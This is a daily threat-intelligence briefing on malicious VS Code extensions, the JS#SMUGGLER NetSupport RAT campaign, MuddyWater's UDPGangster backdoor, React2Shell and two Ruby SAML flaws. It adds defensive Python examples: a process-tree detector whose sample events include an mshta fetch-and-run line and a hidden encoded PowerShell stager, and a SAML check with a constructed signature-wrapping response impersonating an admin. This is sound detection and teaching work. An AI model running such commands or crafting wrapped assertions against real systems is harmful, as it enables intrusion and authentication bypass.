Daily Threat Briefing

Cyware Daily Threat Intelligence, December 09, 2025


Developers are being targeted by a trojan horse campaign that has silently spread for seven years. A massive malware operation has used malicious VSCode extensions to infect over 4.3 million browsers. Masquerading as helpful coding tools, these extensions execute scripts to steal WiFi passwords, hijack sessions, and capture screenshots.

A new threat named JS#SMUGGLER is turning compromised websites into launchpads for sophisticated attacks. This campaign uses an obfuscated JavaScript loader to inject a malicious HTML Application that eventually deploys the NetSupport RAT.

A critical vulnerability in React Server Components, dubbed React2Shell, is being actively exploited by Chinese threat actors. Tracked as CVE-2025-55182, this flaw allows attackers to execute arbitrary code via simple HTTP requests. The vulnerability is widespread, affecting nearly 40% of scanned cloud environments.

Top Malware Reported in the Last 24 Hours

Researchers uncover malicious developer tools

Over seven years, a malware campaign has infected 4.3 million browsers through malicious VS Code extensions, notably Bitcoin Black and Codo AI. These extensions, masquerading as a harmless theme and an AI coding assistant, execute scripts that capture screenshots, steal WiFi passwords, and hijack browser sessions. The attacker evolved their methods, initially using complex PowerShell scripts before transitioning to simpler batch scripts for payload delivery. Additionally, malicious Go and npm packages utilized typosquatting techniques to impersonate trusted libraries, while a Rust package acted as a loader for further malware. DLL hijacking techniques allow the malware to leverage the legitimate Lightshot executable, making detection difficult. 

JS#SMUGGLER campaign deploys NetSupport RAT

A new campaign, dubbed JS#SMUGGLER, has been detected utilizing compromised websites to distribute the NetSupport RAT. This multi-stage attack employs an obfuscated JavaScript loader, which injects an HTML Application (HTA) that runs encrypted PowerShell scripts via "mshta.exe." The JavaScript loader is designed to profile devices, determining whether to serve a full-screen iframe for mobile users or a second-stage script for desktop users. Once the HTA payload is executed, it downloads and executes the PowerShell stager in memory to avoid detection, ultimately deploying the NetSupport RAT. This malware grants attackers complete control over the victim's system, enabling remote desktop access, data theft, and command execution. 

MuddyWater uses new UDPGangster backdoor

MuddyWater, an Iranian hacking group, has been observed deploying a new backdoor known as UDPGangster, utilizing the User Datagram Protocol (UDP) for C2 operations. This cyberespionage campaign targets users in Turkey, Israel, and Azerbaijan through spear-phishing tactics that involve sending booby-trapped Microsoft Word documents. These documents, disguised as invitations to a seminar from the Turkish Republic of Northern Cyprus Ministry of Foreign Affairs, prompt users to enable macros, which execute embedded malicious code. The UDPGangster payload establishes persistence by modifying the Windows Registry and incorporates extensive anti-analysis checks to evade detection. Once operational, it gathers system information and connects to an external server over UDP to exfiltrate data, execute commands, and deploy additional payloads.
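Both the JS#SMUGGLER chain above (browser to mshta.exe to an in-memory PowerShell stager) and the MuddyWater lure (a Word document whose macro launches embedded code) surface in endpoint telemetry as suspicious parent/child process pairs. The following is an added example, not code from the briefing or from either research team: a small triage routine over constructed Sysmon-style process-creation events that flags those relationships. Event field names, hostnames, paths and the placeholder encoded command are all assumptions for the example.

```python
"""Triage process-creation events for the living-off-the-land chains in the briefing.

Added example: rules are derived from the behaviour the briefing describes
(mshta.exe running an HTA that launches PowerShell; an Office macro spawning
a shell), not from any vendor signature. Event shape is a constructed,
Sysmon-like dict, not real telemetry.
"""
import ntpath
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "iexplore.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Constructed sample events (assumed field names: host, parent, image, cmdline).
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/update.hta"},
    {"host": "ws01", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc BASE64PLACEHOLDER"},
    {"host": "ws02", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c start /min dropper.exe"},
    {"host": "ws03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

ENCODED_FLAG = re.compile(r"(?i)(^|\s)-(enc|encodedcommand|ec)\b")
HIDDEN_FLAG = re.compile(r"(?i)(^|\s)-w(indowstyle)?\s+hidden\b")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def classify(event: dict) -> list:
    """Return the sorted list of rule names an event matches (empty if benign)."""
    parent, image, cmdline = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    hits = []
    if parent in BROWSERS and image == "mshta.exe":
        hits.append("browser_spawns_mshta")          # JS#SMUGGLER first stage
    if parent == "mshta.exe" and image in POWERSHELL:
        hits.append("mshta_spawns_powershell")       # HTA launching the stager
    if image in POWERSHELL and (ENCODED_FLAG.search(cmdline) or HIDDEN_FLAG.search(cmdline)):
        hits.append("encoded_or_hidden_powershell")  # in-memory stager indicators
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("office_spawns_shell")           # macro-driven execution
    return sorted(hits)


def triage(events: list) -> list:
    """Flatten matches into (host, rule, image) tuples for a ticket or SIEM alert."""
    return [(e["host"], rule, basename(e["image"]))
            for e in events for rule in classify(e)]


if __name__ == "__main__":
    for host, rule, image in triage(SAMPLE_EVENTS):
        print(f"{host}: {rule} ({image})")
```

Parent/child rules like these are noisy in isolation (administrators do run encoded PowerShell), so in practice each hit is weighted and correlated with the network connection that follows; the point of the example is that both campaigns in this briefing pass through the same small set of signed Windows binaries.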

Top Vulnerabilities Reported in the Last 24 Hours

React2Shell vulnerability under active exploitation

A critical vulnerability, CVE-2025-55182 (React2Shell), affecting React Server Components is being actively exploited by Chinese threat actors. The vulnerability stems from unsafe payload deserialization at React Server Function endpoints, allowing attackers to execute arbitrary code via crafted HTTP requests. Approximately 39% of scanned cloud environments contain vulnerable React instances, with exploitation attempts showing nearly 100% success rates. Popular frameworks and libraries like Next.js, React Router, and others are also affected by this vulnerability. 

Critical vulnerabilities in Ruby SAML library

A pair of critical vulnerabilities, CVE-2025-66567 and CVE-2025-66568, have been discovered in the Ruby SAML library, which is essential for implementing client-side SAML authorization. Both vulnerabilities have a CVSS score of 9.3, exposing applications to authentication bypass attacks that allow malicious actors to impersonate users without valid credentials. CVE-2025-66567 stems from discrepancies in XML parsing between ReXML and Nokogiri, enabling Signature Wrapping attacks. Meanwhile, CVE-2025-66568 arises from a flaw in the Libxml2 library during the canonicalization process, leading to issues like Digest Bypass and Signature Replay.
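Signature Wrapping works because the element a parser hands to the application (typically "the first Assertion") is not the element the signature actually covers, and the parser discrepancy described above is one way to widen that gap. The following is an added example, not ruby-saml's own code or its fix: a structural consistency check, written with Python's stdlib XML parser, that rejects a response unless every Signature is a direct child of the element whose ID its Reference names, every Assertion is covered by a signature, and exactly one Assertion is present. Both SAML documents are constructed for the example (the Signature elements are structural stubs with no real digest or key material), and the function names are assumptions.

```python
"""Structural checks against SAML Signature Wrapping, added example (not ruby-saml code).

Cryptographic verification of the signature is out of scope here; the checks
below run alongside it and answer a different question: does the element the
application is about to trust match the element the signature covers?
"""
import xml.etree.ElementTree as ET

NS = {
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}
ASSERTION = f"{{{NS['saml']}}}Assertion"
RESPONSE = f"{{{NS['samlp']}}}Response"
SIGNATURE = f"{{{NS['ds']}}}Signature"
REFERENCE = f"{{{NS['ds']}}}Reference"
NAME_ID = f"{{{NS['saml']}}}Subject/{{{NS['saml']}}}NameID"

# Constructed, well-formed response: one assertion, signed in place, reference matches.
GOOD_RESPONSE = """
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
                xmlns:ds="http://www.w3.org/2000/09/xmldsig#" ID="_r1">
  <saml:Assertion ID="_a1">
    <saml:Subject><saml:NameID>alice@example.invalid</saml:NameID></saml:Subject>
    <ds:Signature><ds:SignedInfo><ds:Reference URI="#_a1"/></ds:SignedInfo></ds:Signature>
  </saml:Assertion>
</samlp:Response>
"""

# Constructed wrapped response: the signed assertion is moved into Extensions,
# and an unsigned assertion with a different ID sits where a naive parser looks first.
WRAPPED_RESPONSE = """
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
                xmlns:ds="http://www.w3.org/2000/09/xmldsig#" ID="_r1">
  <samlp:Extensions>
    <saml:Assertion ID="_a1">
      <saml:Subject><saml:NameID>alice@example.invalid</saml:NameID></saml:Subject>
      <ds:Signature><ds:SignedInfo><ds:Reference URI="#_a1"/></ds:SignedInfo></ds:Signature>
    </saml:Assertion>
  </samlp:Extensions>
  <saml:Assertion ID="_evil">
    <saml:Subject><saml:NameID>admin@example.invalid</saml:NameID></saml:Subject>
  </saml:Assertion>
</samlp:Response>
"""


def check_saml_response(xml_text: str) -> list:
    """Return a list of structural findings; an empty list means the layout is consistent."""
    root = ET.fromstring(xml_text)
    parent_of = {child: p for p in root.iter() for child in p}
    findings = []

    assertions = list(root.iter(ASSERTION))
    if len(assertions) != 1:
        findings.append(f"assertion_count={len(assertions)}")
    ids = [a.get("ID") for a in assertions]
    if len(set(ids)) != len(ids):
        findings.append("duplicate_assertion_id")

    signed = set()  # elements whose own Signature references their own ID
    signatures = list(root.iter(SIGNATURE))
    if not signatures:
        findings.append("no_signature")
    for sig in signatures:
        owner = parent_of.get(sig)
        if owner is None or owner.tag not in (ASSERTION, RESPONSE) or not owner.get("ID"):
            findings.append("signature_not_child_of_assertion_or_response")
            continue
        for ref in sig.iter(REFERENCE):
            uri = (ref.get("URI") or "").lstrip("#")
            if uri != owner.get("ID"):
                findings.append(f"reference_mismatch:{uri}!={owner.get('ID')}")
            else:
                signed.add(owner)

    # Every assertion must be signed itself or live inside a signed Response.
    for a in assertions:
        if a not in signed and root not in signed:
            findings.append(f"unsigned_assertion:{a.get('ID')}")
    return findings


def trusted_name_id(xml_text: str):
    """NameID of the single consistent assertion, or None if any finding exists."""
    if check_saml_response(xml_text):
        return None
    root = ET.fromstring(xml_text)
    assertion = next(root.iter(ASSERTION))
    node = assertion.find(NAME_ID)
    return node.text if node is not None else None


if __name__ == "__main__":
    print("good:", check_saml_response(GOOD_RESPONSE), trusted_name_id(GOOD_RESPONSE))
    print("wrapped:", check_saml_response(WRAPPED_RESPONSE), trusted_name_id(WRAPPED_RESPONSE))
```

The decisive design choice is the last loop: the application never selects "the first Assertion" and then checks whether a signature exists somewhere in the document; it selects only an assertion that its own verified Reference points at. That rule survives parser disagreements about element position, which is exactly what the ReXML/Nokogiri discrepancy exploits.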

Tags: Ruby SAML, CVE-2025-66567, CVE-2025-66568, React2Shell, MuddyWater, UDPGangster backdoor, JS#SMUGGLER, NetSupport RAT, Bitcoin Black, Codo AI
